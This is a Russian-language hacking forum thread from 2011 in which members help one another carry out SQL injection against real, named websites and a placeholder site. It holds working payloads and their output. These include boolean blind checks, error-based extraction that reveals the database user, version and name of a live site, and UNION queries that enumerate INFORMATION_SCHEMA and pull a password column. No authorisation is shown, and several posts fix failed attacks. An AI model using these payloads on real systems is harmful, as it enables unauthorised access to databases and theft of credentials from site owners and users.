03.08.2011, 23:15
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
выдаеться ошибка скули, добился через blind
но не могу немного в ней разобраться, вот она:
Код:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.
звездочками закрыл ip |
|
|
03.08.2011, 23:41
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от foozzi
выдаеться ошибка скули, добился через blind
но не могу немного в ней разобраться, вот она:
Код:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.
звездочками закрыл ip ошибка тебе выдается потому что нет таблици user, покажи сам запрос который делаешь
|
|
|
|
03.08.2011, 23:53
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от foozzi
выдаеться ошибка скули, добился через blind
но не могу немного в ней разобраться, вот она:
Код:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.
звездочками закрыл ip у тя там инсерт происходит, ты не можешь выводить. Это как общее, а у юзера закрыты права на селект.
|
|
|
|
04.08.2011, 00:07
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
Сообщение от Melfis
у тя там инсерт происходит, ты не можешь выводить. Это как общее, а у юзера закрыты права на селект.
вот открывает страницу, по идее все норм
Код:
http://www.seesciencepolicy.org/sitegenius/topic.php?id=361 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1
|
|
|
|
04.08.2011, 00:44
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
вот тебе вывод через ошибку:
Сообщение от None
http://www.seesciencepolicy.org/sitegenius/topic.php?id=361+OR+(SELECT+COUNT(*)+FROM+(SELECT+ 1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT( MID((select+concat_ws(0x3a,user(),version(),databa se())),1,63),+FLOOR(RAND(0)*2)))
seesci_org@s3951@s109.loopia.se:5.0.87-log:seesciencepolicy_org |
|
|
|
05.08.2011, 13:00
|
|
Новичок
Регистрация: 14.07.2011
Сообщений: 10
С нами:
7805846
Репутация:
0
|
|
Направьте на путь истинный пожалуйста)
На запрос:
Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--
нормально выдает имена всех таблиц.
На запрос:
Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=CHAR(таблица)--
корректно отдает имена столбцов.
А на запрос:
Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(столбец),4,5,6+from+таблица--
шлет лесом вот такой фразой:
Код:
MySQL error:
1146 : Table 'база.таблица' doesn't exist
Как так не существует?? Ведь я же по второму запросу корректно получил столбцы из этой таблицы... И такая история по всем таблицам. Колонки получаю, а тяну данные, пишет, что таблицы нет.
Как такое возможно? |
|
|
|
05.08.2011, 13:41
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от DronS
Направьте на путь истинный пожалуйста)
На запрос:
Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--
нормально выдает имена всех таблиц.
На запрос:
Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=CHAR(таблица)--
корректно отдает имена столбцов.
А на запрос:
Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(столбец),4,5,6+from+таблица--
шлет лесом вот такой фразой:
Код:
MySQL error:
1146 : Table 'база.таблица' doesn't exist
Как так не существует?? Ведь я же по второму запросу корректно получил столбцы из этой таблицы... И такая история по всем таблицам. Колонки получаю, а тяну данные, пишет, что таблицы нет.
Как такое возможно? Возможно нет доступа, нет таблицы, наложен чудодейственный фильтр или INFORMATION_SCHEMA вообще муляж.Попробуй обратиться к другим таблицам из INFORMATION_SCHEMA, и к таблицам к текущей базе данных.
|
|
|
|
05.08.2011, 13:49
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от DronS
Направьте на путь истинный пожалуйста)
вообще-то правильней сделать так:
Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( table_schema,0x3a,table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--
дальше получаешь колонки, и обращаешься:
Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( столбец),4,5,6+from+база.таблица--
Всё дело в том, что ты пытаешься обратится к таблице которая скорее всего находится в другой базе, т.к. обращаться нужно напрямую "база.таблица"
|
|
|
|
05.08.2011, 16:25
|
|
Познающий
Регистрация: 03.06.2011
Сообщений: 85
С нами:
7864886
Репутация:
0
|
|
Сообщение от None
http://www.infinitestatue.com/product_info.php?products_id='60
I see it have error but when i type:
Сообщение от None
http://www.infinitestatue.com/product_info.php?products_id=60' (nothing)
can anybody help me, pls! thank
|
|
|
|
05.08.2011, 16:31
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от oODungVTOo
I see it have error but when i type:
can anybody help me, pls! thank
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
